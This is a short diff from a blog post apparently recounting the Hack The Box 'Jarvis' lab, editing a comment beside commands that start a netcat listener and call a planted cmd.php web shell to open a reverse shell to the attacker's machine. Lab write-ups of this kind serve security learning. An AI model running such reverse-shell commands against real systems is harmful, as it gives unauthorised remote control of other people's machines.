Dreamscent/Dreamscent.github.io/_posts/2019-11-10-HTB-Jarvis.md

 # create listener
 nc -lvp 443

-# call our reverse shell
+# call our reverse shell(please use a different terminal for this, don't do it in the listner)

 curl -X GET "http://10.10.10.143/cmd.php?cmd=nc%2010.10.14.4%20443%20-e%20/bin/sh"
 ~~~